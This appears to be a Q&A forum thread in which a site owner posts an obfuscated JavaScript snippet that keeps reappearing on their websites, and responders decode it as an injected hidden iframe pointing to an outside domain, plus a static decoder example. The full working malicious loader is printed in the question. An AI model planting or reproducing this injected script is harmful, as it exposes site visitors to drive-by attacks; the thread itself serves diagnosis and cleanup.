+2  Q: 

Javascript "virus"

I have a problem with some JS "virus" on all of my websites. They're on different hostings, and on some of them this code appears.

<script>
function c2670903e0i49d9f1a845f6b(i49d9f1a846377) {
    var i49d9f1a846737 = 16;
    return (parseInt(i49d9f1a846377, i49d9f1a846737));
}
function i49d9f1a8472f3(i49d9f1a8476d9) {
    var i49d9f1a848679 = 2;
    var i49d9f1a847da9 = '';
    i49d9f1a848e47 = String.fromCharCode;
    for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) {
        i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679))));
    }
    return i49d9f1a847da9;
}
var r1a = '';
var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E';
document.write(i49d9f1a8472f3(i49d9f1a84922e));
</script>

NOD32 blocks the website because it believes there is a virus. Deleting the code from the sources doesn't help, because it reappears again. It can't be the result of XSS, because it appears even on static websites.

I've tried a full scan of my system and it didn't help. The only thing that is on all websites is Google Analytics, which I think couldn't cause this.

edit: You can see it for example at http://www.postuj.cz/test/ or at http://flavicius.php5.cz/.

+4  A: 

It looks like Vundo or a variant of it. That piece of malware has a tendency to insert seemingly meaningless javascript into sites (on your end, not the server-side). I'd suggest trying Malwarebytes' Anti-Malware. Install it, update it, and do a full scan. If that fails, perhaps try researching options for removing Vundo specifically.

Ryan Van Antwerp
+5  A: 

They're on different hostings, and on some of them this code appears.

Is the code the same on every host? Can you give an example of one of the affected domains so we can check that the code exists on the server side and not just on your machine (which would normally be pretty unlikely).

The code you posted is certainly very suspicious. Once decoded, it writes an iframe to http://​ecom.rarebreedfootwear.com/? (it tries to add a cachebuster random number to the URL, but fails due to a typo).

There is nothing obviously exploity at that address — perhaps the final target exploit hasn't been put in place yet, or it's just a test run for a real attack later, but an unexpected JavaScript appearing on your site which decodes itself and adds an iframe is a huge red flag. Usually this means your server has been compromised and needs re-installing from scratch with new passwords.

ETA:

you can see it for example at hxxp://flavicius.php5.cz/

Thanks. I deleted the comment to hide the working URL, because it is indeed actually infected. Whether at an application level or Apache itself isn't clear, but every page has the suspect script at the bottom.

So at least the application and conceivably the server is compromised and should be taken off-line for cleaning, reinstallation, and diagnostics: you need to find out how the attackers got in so it doesn't happen again. As a first guess, check you have the latest version of WordPress, as it has suffered many security holes in the past.

bobince
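The decoding bobince describes, done offline as an added example (this is not code from the question or any answer): the hex literal is pulled out of the script text and transformed with plain string functions, so nothing from the injected script is ever executed.

```javascript
// Added example, not code from the question or any answer: a static decoder
// for the injected script's two obfuscation stages. Nothing is eval'd; the hex
// string is parsed out of the source text and transformed with plain string code.

// Right-hand side of the `var i49d9f1a84922e = ...` line from the question;
// the r1a pieces are empty strings, so only the quoted fragments matter.
const SAMPLE_ASSIGNMENT = `'3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E'`;

// Stage 0: collect the quoted hex fragments of the '..' + r1a + '..' expression
// without executing it (empty-string padding simply contributes nothing).
function extractHexLiteral(jsExpr) {
  return Array.from(jsExpr.matchAll(/'([0-9A-Fa-f]*)'/g), (m) => m[1]).join('');
}

// Stage 1: what the script's parseInt(x, 16) / String.fromCharCode loop does:
// every pair of hex digits is one character code.
function hexPairsToString(hex) {
  if (hex.length % 2 !== 0) throw new Error('odd-length hex payload');
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Stage 2: the inner document.write(unescape('...')); decode %xx ourselves
// rather than calling the deprecated global unescape.
function percentDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Run both stages and report what the script would actually write into the page.
function analyse(jsExpr) {
  const stage1 = hexPairsToString(extractHexLiteral(jsExpr));
  const inner = stage1.match(/unescape\(\s*'([^']*)'\s*\)/);
  const html = inner ? percentDecode(inner[1]) : stage1;
  const iframe = html.match(/<iframe\b[^>]*\bsrc=['"]([^'"]*)['"]/i);
  return {
    stage1,                                   // the wrapper <script> with its myia guard
    html,                                     // the decoded markup passed to document.write
    iframeSrc: iframe ? iframe[1] : null,     // src as the browser would see it
    hidden: /visibility\s*:\s*hidden/i.test(html),
  };
}

console.log(analyse(SAMPLE_ASSIGNMENT));
```

The reported iframeSrc stops at the first quote of the decoded markup, which is exactly why the random cachebuster never becomes part of the URL, as bobince noted; the hidden flag and the fixed 521x484 size are the traits to key a content scan on.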
A: 

I have written a server-side code removal tool in ASP.Net Here. Hope this will help you save time cleaning the hosted files :) This is much faster than cleaning the files via FTP or your control panel.

Faiz